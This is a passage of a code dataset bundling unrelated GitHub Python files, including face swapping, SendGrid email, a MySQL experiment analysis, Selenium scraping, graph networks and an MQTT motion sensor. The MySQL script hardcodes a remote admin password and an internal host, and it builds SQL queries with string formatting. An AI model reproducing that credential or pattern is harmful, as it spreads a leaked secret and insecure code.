Triangulation of second face\r\n tr2_pt1 = landmarks_points2[triangle_index[0]]\r\n tr2_pt2 = landmarks_points2[triangle_index[1]]\r\n tr2_pt3 = landmarks_points2[triangle_index[2]]\r\n triangle2 = np.array([tr2_pt1, tr2_pt2, tr2_pt3], np.int32)\r\n\r\n rect2 = cv2.boundingRect(triangle2)\r\n (x, y, w, h) = rect2\r\n\r\n cropped_tr2_mask = np.zeros((h, w), np.uint8)\r\n\r\n points2 = np.array([[tr2_pt1[0] - x, tr2_pt1[1] - y],\r\n [tr2_pt2[0] - x, tr2_pt2[1] - y],\r\n [tr2_pt3[0] - x, tr2_pt3[1] - y]], np.int32)\r\n\r\n cv2.fillConvexPoly(cropped_tr2_mask, points2, 255)\r\n\r\n # 
Warp triangles\r\n points = np.float32(points)\r\n points2 = np.float32(points2)\r\n M = cv2.getAffineTransform(points, points2)\r\n warped_triangle = cv2.warpAffine(cropped_triangle, M, (w, h))\r\n warped_triangle = cv2.bitwise_and(warped_triangle, warped_triangle, mask=cropped_tr2_mask)\r\n\r\n # Reconstructing destination face\r\n img2_new_face_rect_area = img2_new_face[y: y + h, x: x + w]\r\n img2_new_face_rect_area_gray = cv2.cvtColor(img2_new_face_rect_area, cv2.COLOR_BGR2GRAY)\r\n _, mask_triangles_designed = cv2.threshold(img2_new_face_rect_area_gray, 1, 255, cv2.THRESH_BINARY_INV)\r\n warped_triangle = cv2.bitwise_and(warped_triangle, warped_triangle, mask=mask_triangles_designed)\r\n\r\n img2_new_face_rect_area = cv2.add(img2_new_face_rect_area, warped_triangle)\r\n img2_new_face[y: y + h, x: x + w] = img2_new_face_rect_area\r\n\r\n # Face swapped (putting 1st face into 2nd face)\r\n img2_face_mask = np.zeros_like(img2_gray)\r\n img2_head_mask = cv2.fillConvexPoly(img2_face_mask, convexhull2, 255)\r\n img2_face_mask = cv2.bitwise_not(img2_head_mask)\r\n\r\n img2_head_noface = cv2.bitwise_and(img2, img2, mask=img2_face_mask)\r\n result = cv2.add(img2_head_noface, img2_new_face)\r\n\r\n (x, y, w, h) = cv2.boundingRect(convexhull2)\r\n center_face2 = (int((x + x + w) / 2), int((y + y + h) / 2))\r\n\r\n seamlessclone = cv2.seamlessClone(result, img2, img2_head_mask, center_face2, cv2.NORMAL_CLONE)\r\n\r\n return seamlessclone\r\n # cv2.imshow(\"seamlessclone\", seamlessclone)\r\n # cv2.waitKey(0)\r\n #\r\n # cv2.destroyAllWindows()\r\n\r\n\r\ndef webcamFaceswap():\r\n cap = cv2.VideoCapture(0)\r\n while True:\r\n xyz, image = cap.read()\r\n secondImage = cv2.imread('data/003147.jpg')\r\n outputImage = faceSwap(image, secondImage)\r\n cv2.imshow('Outputimage', outputImage)\r\n cv2.waitKey(0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n detectFaceLandmarks()\r\n # annotations = anotationsToSomethingNormal()\r\n # foundCoordinates = getDataFromPhotos()\r\n\r\n annotations, foundCoordinates = loadEverything()\r\n\r\n dictionaryMSE = calculateMSE(annotations, foundCoordinates)\r\n\r\n #alignFaces(foundCoordinates)\r\n\r\n averageImage = getAverageImage()\r\n\r\n mostSimilarImage = getMostSimilarImage(averageImage)\r\n\r\n webcamFaceswap()\r\n\r\n","repo_name":"xdurfina/image-face-recognition-and-align","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73841916212","text":"## https://docs.sendgrid.com/for-developers/sending-email/quickstart-python#complete-code-block\n# https://stackoverflow.com/questions/39717986/httperror-http-error-401-unauthorized-for-sendgrid-integration-with-python\n\n# importing library\nimport sendgrid\nimport os\nfrom sendgrid.helpers.mail import Mail, Email, To, Content\n\n# make sure to set environment variable before you do this\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# Functions\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n\n# Function to send email\ndef sendEmailFunc(sendFROMemail,sendTOemail,subjectLine,contentOfMessage):\n sg = sendgrid.SendGridAPIClient(api_key=os.environ.get('SENDGRID_API_KEY'))\n #sg = sendgrid.SendGridAPIClient(api_key)\n from_email = Email(f\"{sendFROMemail}\") # Change to your verified sender\n to_email = To(f\"{sendTOemail}\") # Change to your recipient\n subject = f\"{subjectLine}\"\n content = Content(\"text/plain\", f\"{contentOfMessage}\")\n mail = 
Mail(from_email, to_email, subject, content)\n\n # Get a JSON-ready representation of the Mail object\n mail_json = mail.get()\n\n # Send an HTTP POST request to /mail/send\n response = sg.client.mail.send.post(request_body=mail_json)\n print(response.status_code)\n print(response.headers)\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# Main\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n\n# This is where the information is gathered from the user to craft email\n# mp3converterandencryptor@gmail.com \nsourceEmail = input(\"What email are your sending this from: \")\noutboundEmail = input(\"Who are we sending this to: \")\n\nsubjectOfEmail = input(\"What is the Subject line: \")\ncontentOfEmail = input(\"What content do you want in this email: \")\n\n\nsendEmailFunc(sourceEmail,outboundEmail,subjectOfEmail,contentOfEmail)\n\nprint(\"DONEZO!\")","repo_name":"jacobpclouse/Mp3-Generator","sub_path":"backend/sample Scripts/Send Email with attachments/sendgridEmail_V3.py","file_name":"sendgridEmail_V3.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"8566633493","text":"import numpy as np\nimport pylab as pl\nimport pymysql\nimport sys, traceback\nfrom scipy.optimize import curve_fit\nfrom exp_units_conversions import red_far_by_curr, white_far_by_curr, dry_intQ, final_intQ\n\ndef sweet_print(str_):\n print(\"\\n{:<30} {}\".format(\"[ NOTE ]\", str_))\n\ndef calculate_final_effect(_db_params, _search_table, _exp_id, dM_exp, dM_control,\n R_control, W_control, h_led_control, h_led_exp):\n # get one point remotely and calculate F\n con = pymysql.connect(host=_db_params[\"host\"],\n user=_db_params[\"user\"],\n password=_db_params[\"password\"],\n db=_db_params['db'],\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\n cur = con.cursor()\n\n\n\n # get days of experiment\n comm_str = \"select distinct(date(end_time)) as day from exp_data where \" \\\n \"is_finished=0 and exp_id={};\".format(_exp_id)\n cur.execute(comm_str)\n rows = cur.fetchall()\n # return (_db_params, _search_table, _exp_id)\n days = [x['day'] for x in rows]\n print(\"days of experiment: \")\n for d in days:\n print(str(d))\n E_mean_days = []\n\n # ok_symb = \"[ NOTE ]\"\n\n for d in days:\n print(\"\\n ==================================================================\")\n print(\"try to calculate day {}\".format(d))\n print(\" ==================================================================\")\n # search min_G point and find correspond R_min and W_min\n\n # in db we store at least two rows with same step_id\n # lets load them for every point in _todays_search_table and find mean Q value\n # also we will bubble search point with maximum of mean Q-value\n min_g_point = None\n max_f_point = None\n error_points = list()\n num_of_table_points = 0\n for point in _search_table:\n try:\n comm_str = \"select * from exp_data where date(end_time) = date('{}')\" \\\n \" and exp_id={} and step_id={} and is_finished=0;\".format(\n d, _exp_id, point['number'])\n # print(comm_str)\n cur.execute(comm_str)\n rows = cur.fetchall()\n\n # lets get mean sum of q_val for that two rows\n q1 = rows[0]['q_val']\n q2 = rows[1]['q_val']\n\n mean_q = (q1 + q2) / 2\n\n f1 = rows[0]['f_val']\n f2 = rows[1]['f_val']\n\n mean_f = (f1 + f2) / 2\n\n # add that value to point as new key-value pair\n point.update({'mean_q': mean_q})\n point.update({'mean_f': mean_f})\n\n if not min_g_point:\n # if it is first iteration - 
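# --- Editor's note (hedged sketch) ---
# The queries in this experiment script are assembled with str.format(), which
# is safe only for trusted constants. pymysql supports server-side parameter
# binding with %s placeholders; an equivalent parameterized query would be:
def fetch_step_rows(cur, day, exp_id, step_id):
    cur.execute(
        "select * from exp_data where date(end_time) = date(%s) "
        "and exp_id = %s and step_id = %s and is_finished = 0",
        (day, exp_id, step_id),
    )
    return cur.fetchall()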
set first point as min\n min_g_point = point\n else:\n # compare values of current point and max point\n if point['mean_q'] < min_g_point['mean_q']:\n min_g_point = point\n\n if not max_f_point:\n # if it is first iteration - set first point as min\n max_f_point = point\n else:\n # compare values of current point and max point\n if point['mean_f'] > max_f_point['mean_f']:\n max_f_point = point\n\n num_of_table_points += 1\n except Exception as e:\n exc_info = sys.exc_info()\n err_list = traceback.format_exception(*exc_info)\n print(\"\\n ERROR, point: {} \\n calculation failed: {} \\n\".format(point, err_list))\n error_points.append(point)\n\n min_g_point.update({'date': d})\n max_f_point.update({'date': d})\n sweet_print(\"we have calculated {} search table lines from 16\".format(num_of_table_points))\n\n count_command = \"select count(*) from exp_data where date(end_time)\" \\\n \" = date('{}') and exp_id={};\".format(d, exp_id)\n cur.execute(count_command)\n rows = cur.fetchall()\n num_of_all_points = rows[0]['count(*)']\n sweet_print(\"num of problems in search table {} from 16 \".format(len(error_points)))\n sweet_print(\"full number of day {} stored points is {}, must be about 32 \".format(d, num_of_all_points))\n sweet_print(\"min g point is : {}\".format(min_g_point))\n # print(\"\\n min f point is : {} \\n\".format(max_f_point))\n\n r_min = min_g_point['red']\n w_min = min_g_point['white']\n\n # print(\"final search table:\")\n # for p in _search_table:\n # print(p)\n\n continue_ = str(raw_input(\"would you like to add this day to calculation? y or n: \"))\n if continue_ == 'y':\n\n # second - calculation of control E_mean (in ppfd) final value for each day\n command = \"select * from exp_data where date(end_time) = \" \\\n \"date('{}') and exp_id={};\".format(d, _exp_id)\n cur.execute(command)\n rows = cur.fetchall()\n\n num_of_search_points = len(rows)\n num_of_stable_points = 96 - num_of_search_points\n # 96 is a number of 15-mins intervals in 24 hours\n sweet_print(\"in day {} we got {} search points and {} stable points\".format(\n d, num_of_search_points, num_of_stable_points))\n\n reds = [a[\"red\"] for a in rows ]\n whites = [a[\"white\"] for a in rows]\n\n E_search_summ = 0\n\n for (r, w) in zip(reds, whites):\n E_search_summ += red_far_by_curr(r, \"exp\", h_led_exp) + \\\n white_far_by_curr(w, \"exp\", h_led_exp)\n\n E_search_mean = E_search_summ/96\n E_stable_summ = red_far_by_curr(r_min, \"exp\", h_led_exp) + \\\n white_far_by_curr(w_min, \"exp\", h_led_exp)\n E_stable_mean = E_stable_summ * num_of_stable_points / 96\n sweet_print(\"in day {} we got E_search_summ = {} E_search_mean = {} and E_stable_mean = {}\"\n .format(d, E_search_summ, E_search_mean, E_stable_mean))\n sweet_print(\"r_min_stable = {}, w_min_stable = {}\".format(r_min, w_min))\n\n E_final_exp = E_search_mean + E_stable_mean\n\n sweet_print(\"in day {} we got E_final_mean = {}\"\n .format(d, E_final_exp))\n\n E_mean_days.append(E_final_exp)\n\n print(\"\\n ===========================================================\")\n print(\"final values calculation\")\n # finally - calculation of control G final values for control and experiment\n E_control = red_far_by_curr(R_control, \"control\", h_led_control) + \\\n white_far_by_curr(W_control, \"control\", h_led_control)\n\n sweet_print(\"E_mean_values_for all days is: \\n {}\".format(E_mean_days))\n sweet_print(\"final E_control = {} ppfd, E_exp = {} ppfd\".format(\n E_control, np.mean(E_mean_days)))\n\n G_control_fin = final_intQ(E_control, dM_control, 
mode=\"control\")\r\n    G_exp_fin = final_intQ(np.mean(E_mean_days), dM_exp, mode=\"exp\")\r\n\r\n    sweet_print(\"G_control_fin = {} , G_exp_fin = {}\".format(G_control_fin, G_exp_fin))\r\n\r\n    result = (G_control_fin - G_exp_fin) / G_control_fin * 100\r\n    sweet_print(\"Global result (Gc - Ge)/Gc * 100% = {} %\".format(result))\r\n\r\n\r\n    con.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    search_table = [\r\n        {\"number\": 1, \"red\": 130, \"white\": 130, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 2, \"red\": 70, \"white\": 190, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 3, \"red\": 190, \"white\": 70, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 4, \"red\": 40, \"white\": 160, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 5, \"red\": 160, \"white\": 40, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 6, \"red\": 100, \"white\": 100, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 7, \"red\": 220, \"white\": 220, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 8, \"red\": 25, \"white\": 235, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 9, \"red\": 145, \"white\": 115, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 10, \"red\": 85, \"white\": 55, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 11, \"red\": 205, \"white\": 175, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 12, \"red\": 55, \"white\": 85, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 13, \"red\": 175, \"white\": 205, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 14, \"red\": 115, \"white\": 145, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 15, \"red\": 235, \"white\": 25, \"finished\": 0, 'f': 0, 'q': 0},\r\n        {\"number\": 16, \"red\": 17, \"white\": 138, \"finished\": 0, 'f': 0, 'q': 0}\r\n    ]\r\n\r\n    exp_id = 9\r\n\r\n    db = {\r\n        \"host\": '10.9.0.23',\r\n        \"user\": 'remote_admin',\r\n        \"db\": 'experiment',\r\n        \"password\": \"amstraLLa78x[$\"\r\n    }\r\n\r\n    calculate_final_effect(_db_params=db, _search_table=search_table,\r\n                           _exp_id=exp_id, dM_exp=149, dM_control=232,\r\n                           R_control=10, W_control=250, h_led_control=25, h_led_exp=25)\r\n\r\n","repo_name":"houseofbigseals/ros_farmer_pc","sub_path":"scripts/math_scripts/calculate_final.py","file_name":"calculate_final.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70866478133","text":"from app import app\nfrom models import db, User\n\n# Create all tables\ndb.drop_all()\ndb.create_all()\n\n# If table isn't empty, empty it\nUser.query.delete()\n\n# Add new data\ndata_1 = User(first_name='joel', last_name=\"burton\", image_url=\"profile.jpg\")\ndata_2 = User(first_name='alan', last_name=\"alda\")\ndata_3 = User(first_name='jane', last_name=\"smith\")\n\n# Add new objects to session, so they'll persist\ndb.session.add(data_1)\ndb.session.add(data_2)\ndb.session.add(data_3)\n\n# Commit--otherwise, this never gets saved!\ndb.session.commit()\n","repo_name":"brianelizondo/python-sqlalchemy-intro","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25223675701","text":"# Modify the previous program so that it also shows the sum of the numbers at the end.\n\nnum1 = int(input('Enter an integer: \\n'))\nnum2 = int(input('Enter another integer: \\n'))\nsoma = 0\nprint('-'*30)\n\nif num1 > num2:\n    for i in range(num2+1, num1):\n        print(i)\n        soma = soma + i\nelif num1 < num2:\n    for i in range(num1+1, num2):\n        print(i)\n        soma = soma + i\nelse:\n    print('Equal 
numbers.')\n\nprint('-'*30)\nprint('The sum of the numbers in the interval between {} and {} is {}.'.format(num1, num2, soma))","repo_name":"Isidroantonio/Exercicios-Python-","sub_path":"ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14312266447","text":"\"\"\"\nAuthor : Akshay Joshi\nGitHub : https://github.com/ijoshi90\nCreated on 11-Sep-19 at 20:26\n\"\"\"\n\nclass Computer:\n    def __init__(self, computer, processor, ram):\n        print (\"In __init__\")\n        globals()['a'] = \"Akshay\"\n        self.computer = computer\n        self.processor = processor\n        self.ram = ram\n\n    def configuration(self):\n        print (\"*** Configuration ***\")\n        print(\"Type : {}\".format(self.computer))\n        print(\"Processor : {}\".format(self.processor))\n        print(\"RAM : {}\".format(self.ram))\n\ncom1 = Computer(\"Desktop\", \"i5\", \"1 x 8GB\")\ncom2 = Computer(\"Laptop\", \"i7\", \"1 x 8GB\")\n\ncom1.configuration()\nprint (\"A : {}\".format(a))\ncom2.configuration()","repo_name":"ijoshi90/Python","sub_path":"Python/init_method.py","file_name":"init_method.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71577469172","text":"import decoding_2d as dc2\nimport decoding_3d as dc3\nimport pickle as pkl\nimport numpy as np\nfrom multiprocessing import Process\nfrom timeit import default_timer as timer\n\ndef run_batch(err_lo, err_hi, n_points, dists, n_trials, flnm, sim_type='iidxz'):\n    \"\"\"\n    Makes a bunch of simulation objects and runs them, based on input\n    parameters.\n    \"\"\"\n    sim_type = sim_type.lower()\n    if sim_type not in ['iidxz', 'pq', 'circ']:\n        raise ValueError(\"sim_type must be one of: ['iidxz', 'pq', 'circ']\")\n\n    errs = np.linspace(err_lo, err_hi, n_points)\n    output_dict = locals()\n\n    for dist in dists:\n        failures = []\n        for err in errs:\n            if sim_type == 'iidxz':\n                current_sim = dc2.Sim2D(dist, dist, err)\n            elif sim_type == 'pq':\n                current_sim = dc3.Sim3D(dist, dist, ('pq', err, err))\n            elif sim_type == 'circ':\n                raise NotImplementedError(\"Coming Soon!\")\n\n            current_sim.run(n_trials, progress=False)\n            failures.append(current_sim.errors)\n        output_dict.update({'failures ' + str(dist) : failures})\n\n    with open(flnm, 'wb') as phil:\n        pkl.dump(output_dict, phil)\n\n    pass\n\n\ndef run_batch_par(err_lo, err_hi, n_points, dists, n_trials, flnm, sim_type, nThreads):\n    jobs = []\n    trialsPerThread = n_trials//nThreads\n\n    for i in range(nThreads):\n        fname = \"out\" + str(i) + \".dat\"\n        p = Process(target=run_batch, args=(err_lo, err_hi, n_points, dists, trialsPerThread, fname, sim_type,))\n        jobs.append(p)\n        p.start()\n\n    for p in jobs:\n        p.join()\n\nif __name__ == '__main__':\n    from sys import argv\n    nThreads = 4\n    n_trials = nThreads*16 # keep it a multiple of nThreads for now\n    err_lo = 0.01\n    err_hi = 0.03\n    n_points = 30\n    dists = [25]\n    flnm = 'out.dat'\n    sim_type = 'iidxz'\n\n    # just for benchmarking/testing\n    # comment for actual run\n    print(\"Sequential execution ...\")\n    start = timer()\n    run_batch(err_lo, err_hi, n_points, dists, n_trials, flnm, sim_type)\n    end = timer()\n    seqtime = (end-start)\n    print(\"Sequential execution took : {0} ms\".format(seqtime*1e3))\n\n    print(\"Parallel execution ...\")\n    start = timer()\n    run_batch_par(err_lo, err_hi, n_points, dists, n_trials, flnm, sim_type, nThreads)\n    end = timer()\n    partime = (end-start)\n    print(\"Parallel execution on {0} threads took {1} 
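# --- Editor's note (hedged sketch) ---
# run_batch_par() above fans work out with raw Process objects and joins them
# by hand. A multiprocessing.Pool expresses the same fan-out/fan-in more
# compactly; starmap blocks until every worker has finished. Same argument
# order as run_batch; the out{i}.dat naming mirrors the original.
from multiprocessing import Pool

def run_batch_pool(err_lo, err_hi, n_points, dists, n_trials, sim_type, n_threads):
    per_thread = n_trials // n_threads
    jobs = [
        (err_lo, err_hi, n_points, dists, per_thread, "out" + str(i) + ".dat", sim_type)
        for i in range(n_threads)
    ]
    with Pool(n_threads) as pool:
        pool.starmap(run_batch, jobs)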
ms \".format(nThreads,partime*1e3) )\n","repo_name":"bcriger/sc_decoding","sub_path":"run_script_par.py","file_name":"run_script_par.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38504281684","text":"from gpiozero import MotionSensor\nimport paho.mqtt.publish as publish\nimport os\n\n# publish a message then disconnect.\nhost = os.environ['MQTT_HOST']\ntopic = os.environ['MQTT_TOPIC']\npin = int(os.environ['PIN_INPUT'])\n\n#pir sensor\npir = MotionSensor(pin)\ncurren_status = 0\nlast_status = 0\n\nwhile True:\n curren_status = pir.motion_detected\n\n if curren_status and curren_status!=last_status:\n print(\"Motion detected!\")\n publish.single(topic, 1, qos=1, hostname=host)\n elif not curren_status and curren_status!=last_status:\n print(\"Nothing\")\n publish.single(topic, 0, qos=1, hostname=host)\n last_status = curren_status\n","repo_name":"WakeupTsai/docker-rpi-pir-mqtt","sub_path":"pir-mqtt/pir_mqtt.py","file_name":"pir_mqtt.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23129618805","text":"#!/usr/bin/env python3\n\nimport hashlib\nimport hmac\nimport timeit\n\nNUMBER_DIGESTS = 100000\n\nSECRET = \"This-is-my-super-duper-secret-key-12345#\"\n\ndef digest_loop(digestmod, data):\n the_hmac = hmac.new(SECRET.encode(), digestmod=digestmod)\n the_hmac.update(data)\n _digest = the_hmac.digest()\n\ndef digest_measurement(digestmod, digestmod_name, data_len):\n data = b'\\xab' * data_len\n measured_function = lambda: digest_loop(digestmod, data)\n time_in_secs = timeit.timeit(measured_function, number=NUMBER_DIGESTS)\n hashes_per_second = NUMBER_DIGESTS / time_in_secs\n usecs_per_hash = 1000000 / hashes_per_second\n print(\"{:12} {:12,} {:12,} {:12,}\".format(digestmod_name, data_len, int(hashes_per_second),\n int(usecs_per_hash)))\n\ndef experiment():\n print(\"{:12} {:12} {:12} {:12}\".format(\"Algo\", \"Data size\", \"Digests/sec\", \"Usec/digest\"))\n line = '-' * 12\n print(\"{:12} {:12} {:12} {:12}\".format(line, line, line, line))\n for data_len in [10, 100, 1500, 10000]:\n for digestmod, digestmod_name in [(hashlib.md5, \"MD-5\"),\n (hashlib.sha1, \"SHA-1\"),\n (hashlib.sha224, \"SHA-224\"),\n (hashlib.sha256, \"SHA-256\"),\n (hashlib.sha384, \"SHA-384\"),\n (hashlib.sha512, \"SHA-512\"),\n (hashlib.sha3_224, \"SHA3-224\"),\n (hashlib.sha3_256, \"SHA3-256\"),\n (hashlib.sha3_384, \"SHA3-384\"),\n (hashlib.sha3_512, \"SHA3-512\"),\n (hashlib.blake2b, \"BLAKE-2B\"),\n (hashlib.blake2s, \"BLAKE-2S\")]:\n digest_measurement(digestmod, digestmod_name, data_len)\n\nif __name__ == \"__main__\":\n experiment()\n","repo_name":"brunorijsman/python-hash-experiments","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20034461839","text":"import scrapy\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom porcelain.items import jiadeItems\n\n\nbrowser = webdriver.Chrome()\n\n\nclass JiadeSpider(scrapy.Spider):\n name = 'jiade'\n allowed_domains = ['cguardian.com']\n start_urls = ['https://www.cguardian.com/Auctions/AuctionResult']\n\n def parse(self, response):\n try:\n browser.get(self.start_urls[0])\n all_url_count = int(browser.find_element_by_xpath(\n 
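# --- Editor's note (hedged sketch) ---
# experiment.py above only measures digest throughput. When an HMAC is used
# to *verify* a message, the comparison should be constant-time so an
# attacker cannot learn how many leading bytes matched; the standard library
# provides hmac.compare_digest for exactly that:
import hashlib
import hmac

def verify_tag(key: bytes, data: bytes, received_tag: bytes) -> bool:
    expected = hmac.new(key, data, digestmod=hashlib.sha256).digest()
    return hmac.compare_digest(expected, received_tag)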
'//*[@id=\"app\"]/div/div[2]/div/div[3]/div[2]/div[12]/div/span/div/input'\n            ).get_attribute('max'))\n            for page in range(1, all_url_count):\n                self.page_click(browser, page)\n                for item in range(2, 12):\n                    be_re = f'//*[@id=\"app\"]/div/div[2]/div/div[3]/div[2]/div[{str(item)}]'\n                    be_item_click = browser.find_element_by_xpath(be_re)\n                    be_item_click.click()\n                    all_items_count = len(browser.find_elements_by_xpath('//div[@class=\"category-list-border\"]/div'))\n                    for i in range(1, all_items_count+1):\n                        be_item_re = be_re + f'/div[2]/div[{str(i)}]'\n                        self.item_click(browser, be_item_re)\n                        self.parse_data(browser)\n\n                        be_item_count = int(browser.find_element_by_xpath('//*[@id=\"item-content\"]/div[2]/div/span/div/input').get_attribute('max'))\n                        for j in range(1, be_item_count+1):\n                            new_item_page = browser.find_element_by_xpath('//*[@id=\"item-content\"]/div[2]/div/span/div/input')\n                            new_item_page.clear()\n                            new_item_page.send_keys(j)\n                            new_item_page.send_keys(Keys.ENTER)\n                            self.parse_data(browser)\n                            browser.back()\n\n\n        except Exception as e:\n            print(e)\n\n\n    def page_click(self, browser, page):\n        page_click = browser.find_element_by_class_name('el-input__inner')\n        page_click.clear()\n        page_click.send_keys(page)\n        page_click.send_keys(Keys.ENTER)\n\n    def item_click(self, browser, be_item_re):\n        item = browser.find_element_by_xpath(be_item_re)\n        item.click()\n\n    def parse_data(self, browser):\n        pa_data = browser.find_elements_by_xpath('//*[@id=\"item-content\"]/div/div')\n        for item in pa_data:\n            item = item.text\n            item_list = item.splitlines()\n            if len(item_list) == 4:\n                data = jiadeItems()\n                data['num'], data['name'], data['date'], data['price'] = item_list\n\n\n\n\n\n","repo_name":"delcok/Scrapy_for_someone","sub_path":"porcelain/spiders/jiade.py","file_name":"jiade.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7173811248","text":"import dgl\nimport dgl.function as fn\nimport tensorflow as tf\n\nfrom core.policy_network import HeteroGraphPolicyNetwork\n\n\nclass Agent:\n    def __init__(self):\n\n        self.policy_network = HeteroGraphPolicyNetwork()\n\n\ndef _construct_segment_pair_auxillary_graph(original_graph, segment_pair):\n    seg_a_pt0 = segment_pair[:, 0]\n    seg_a_pt1 = segment_pair[:, 1]\n    seg_b_pt0 = segment_pair[:, 2]\n    seg_b_pt1 = segment_pair[:, 3]\n\n    n_seg_pairs = segment_pair.shape[0]\n    aux_join_pt0 = tf.range(0, n_seg_pairs, dtype=tf.int64)\n    aux_join_pt1 = tf.range(n_seg_pairs, 2 * n_seg_pairs, dtype=tf.int64)\n    aux_join_pairs = tf.range(0, n_seg_pairs, dtype=tf.int64)\n\n    seg_inds, pt_inds = original_graph.edges(etype=\"segment_has_point\")\n    aux_graph = dgl.heterograph(\n        {\n            (\"point\", \"in\", \"segment\"): (pt_inds, seg_inds),\n            (\"point\", \"join\", \"aux_pt_pair\"): (\n                tf.concat(\n                    [seg_a_pt0, seg_a_pt1, seg_b_pt0, seg_b_pt1], axis=0\n                ),\n                tf.concat(\n                    [aux_join_pt0, aux_join_pt1, aux_join_pt0, aux_join_pt1],\n                    axis=0,\n                ),\n            ),\n            (\"aux_pt_pair\", \"join\", \"seg_pairs\"): (\n                tf.concat([aux_join_pt0, aux_join_pt1], axis=0),\n                tf.concat([aux_join_pairs, aux_join_pairs], axis=0),\n            ),\n        }\n    ) # .long()\n    aux_graph.edges[(\"point\", \"join\", \"aux_pt_pair\")].data[\n        \"weight\"\n    ] = tf.concat(\n        [tf.ones(shape=(2 * n_seg_pairs)), -tf.ones(shape=(2 * n_seg_pairs))],\n        axis=0,\n    )\n    return aux_graph\n\n\ndef _calculate_segment_pair_probabilities(aux_graph, point_logits):\n    with aux_graph.local_scope():\n        aux_graph.nodes[\"point\"].data[\"logit\"] = point_logits\n\n        
aux_graph.update_all(\n message_func=fn.u_mul_e(\"logit\", \"weight\", \"m\"),\n reduce_func=fn.sum(\"m\", \"pt_pair_logit\"),\n etype=(\"point\", \"join\", \"aux_pt_pair\"),\n )\n aux_graph.nodes[\"aux_pt_pair\"].data[\"pt_pair_logit\"] = tf.math.tanh(\n aux_graph.nodes[\"aux_pt_pair\"].data[\"pt_pair_logit\"]\n )\n aux_graph.update_all(\n message_func=fn.copy_u(\"pt_pair_logit\", \"m\"),\n reduce_func=fn.sum(\"m\", \"seg_pair_logit\"),\n etype=(\"aux_pt_pair\", \"join\", \"seg_pairs\"),\n )\n aux_graph.nodes[\"seg_pairs\"].data[\"seg_pair_logit\"] = -tf.math.abs(\n aux_graph.nodes[\"seg_pairs\"].data[\"seg_pair_logit\"]\n )\n probabilities = dgl.softmax_nodes(\n aux_graph, \"seg_pair_logit\", ntype=\"seg_pairs\"\n )\n return probabilities\n","repo_name":"JosephRRB/GFlowNets-on-2D-LCDT","sub_path":"core/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34086610355","text":"#!/usr/bin/python3\n\"\"\"\nPrints all 'City' objects from the database\n\"\"\"\nimport sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom model_city import City, Base\nfrom model_state import State\n\nif __name__ == \"__main__\":\n # Connect to the MySQL server\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n pool_pre_ping=True)\n Base.metadata.create_all(engine)\n\n # Create a Session object\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # Query all City objects and join with the corresponding State object\n city_state_join = (\n session.query(City, State)\n .join(State, City.state_id == State.id)\n )\n\n # Sort the results by City ID in ascending order\n sorted_city_state_join = city_state_join.order_by(City.id.asc())\n\n # Iterate over the sorted City-State pairs\n for city, state in sorted_city_state_join:\n print(f\"{state.name}: ({city.id}) {city.name}\")\n\n # Close the Session\n 